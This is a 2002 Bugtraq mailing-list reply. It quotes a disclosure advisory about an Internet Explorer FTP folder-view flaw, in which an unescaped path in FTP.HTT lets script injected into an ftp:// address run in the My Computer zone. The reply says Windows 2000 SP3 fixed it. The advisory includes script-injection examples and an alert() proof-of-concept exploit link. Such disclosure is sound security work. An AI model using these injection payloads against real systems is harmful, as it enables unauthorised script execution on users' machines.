[26527] in bugtraq
Re: Microsoft Internet Explorer 'Folder View for FTP sites' Script Execution vulnerability
daemon@ATHENA.MIT.EDU (Eiji James Yoshida)
Sat Aug 3 12:56:31 2002
Message-ID: <001701c23b0d$072cdef0$6401a8c0@EnSof>
From: "Eiji James Yoshida" <ptrs-ejy@bp.iij4u.or.jp>
To: <bugtraq@securityfocus.com>
Date: Sun, 4 Aug 2002 01:44:25 +0900
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-2022-jp"
Content-Transfer-Encoding: 7bit
This problem (BugtraqID:4954) was corrected in Windows 2000 Service Pack 3.
Windows2000 SP3 (Q316890)
http://support.microsoft.com/default.aspx?scid=kb;en-us;q316890
Regards,
------------------------------------------------------
Eiji "James" Yoshida
penetration technique research site
E-mail: zaddik@geocities.co.jp
URL: http://www.geocities.co.jp/SiliconValley/1667/index.htm
------------------------------------------------------
----- Original Message -----
From: "Eiji James Yoshida" <ptrs-ejy@bp.iij4u.or.jp>
To: <bugtraq@securityfocus.com>
Sent: Friday, June 07, 2002 12:33 AM
Subject: Microsoft Internet Explorer 'Folder View for FTP sites' Script Execution vulnerability
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> + Title:
> ~~~~~~~~~~~~~~~~~
> Microsoft Internet Explorer 'Folder View for FTP sites' Script Execution vulnerability
>
>
> + Date:
> ~~~~~~~~~~~~~~~~~
> 7 June 2002
>
>
> + Author:
> ~~~~~~~~~~~~~~~~~
> Eiji James Yoshida [zaddik@geocities.co.jp]
>
>
> + Risk:
> ~~~~~~~~~~~~~~~~~
> Medium
>
>
> + Vulnerable:
> ~~~~~~~~~~~~~~~~~
> Windows2000 SP2 IE5.5SP1
> Windows2000 SP2 IE5.5SP2
> Windows2000 SP2 IE6.0
>
>
> + Overview:
> ~~~~~~~~~~~~~~~~~
> IE allows running Malicious Scripts due to a bug in 'folder View for FTP sites'.
>
> If you enable both an 'Enable folder view for FTP sites' IE Advanced Setting
> and an 'Enable Web content in folders' Explorer Folder Option,
> the script embedded in FTP Server Address will run.
> (Both options are set to 'Enable' by default.)
>
> * It's important that the script runs in the My Computer zone!
>
>
> + Details:
> ~~~~~~~~~~~~~~~~~
> The problem is in FTP.HTT invoked by the 'folder view for FTP sites' feature.
> ( %SystemRoot%\WEB\FTP.HTT )
>
> - --------------------FTP.HTT--------------------
> 35: <BASE href="%THISDIRPATH%\">
> - -----------------------------------------------
>
> This '%THISDIRPATH%' is not escaped.
>
> (Example 1)
> [ ftp://TARGET ]
> '%THISDIRPATH%' = 'ftp://TARGET/'
> <BASE href="ftp://TARGET/\">
> ~~~~~~~~~~~~~
> (Example 2)
> [ ftp://"><script>alert("Exploit");</script> ]
> '%THISDIRPATH%' = 'ftp://"><script>alert("Exploit");</script>/'
> <BASE href="ftp://"><script>alert("Exploit");</script>/\">
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
> + Exploit code:
> ~~~~~~~~~~~~~~~~~
> <a href="ftp://%22%3e%3cscript%3ealert(%22Exploit%22)%3b%3c%2fscript%3e%20" target="_blank">Exploit</a>
>
>
> + Demonstration:
> ~~~~~~~~~~~~~~~~~
> http://www.geocities.co.jp/SiliconValley/1667/advisory02e.html
>
>
> + Workaround:
> ~~~~~~~~~~~~~~~~~
> Disable either 'Enable folder view for FTP sites' IE Advanced Setting
> or 'Enable Web content in folders' Explorer Folder Option.
>
>
> + Vendor status:
> ~~~~~~~~~~~~~~~~~
> Microsoft was notified on 21 December 2001.
>
>
> - ----------------------------------------------------------------------
> Eiji "James" Yoshida
> penetration technique research site
> E-mail: zaddik@geocities.co.jp
> URL: http://www.geocities.co.jp/SiliconValley/1667/index.htm
> - ----------------------------------------------------------------------
>
> -----BEGIN PGP SIGNATURE-----
> Version: PGP 6.5.8ckt
> Comment: Eiji James Yoshida
>
> iQA/AwUBPP93/TnqpMRtMot1EQJE+gCg3tezyI7XyhSatXTXkjuwTqkiuroAoOkA
> 55mgpZ0K8d9mx/c0pS2Knqoe
> =PTNT
> -----END PGP SIGNATURE-----
>
>
>
>
